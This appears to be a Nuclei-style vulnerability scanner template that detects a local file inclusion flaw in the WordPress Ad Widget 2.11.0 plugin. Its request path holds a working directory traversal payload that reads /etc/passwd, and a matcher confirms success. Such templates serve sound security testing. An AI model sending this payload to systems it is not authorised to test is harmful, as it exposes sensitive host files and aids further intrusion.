id: ad-widget-lfi

info:
  name: WordPress Ad Widget 2.11.0 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Ad Widget 2.11.0 is vulnerable to local file inclusion. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks.
  reference:
    - https://cxsecurity.com/issue/WLB-2017100084
    - https://plugins.trac.wordpress.org/changeset/1628751/ad-widget
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-content/plugins/ad-widget/views/modal/?step=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/01
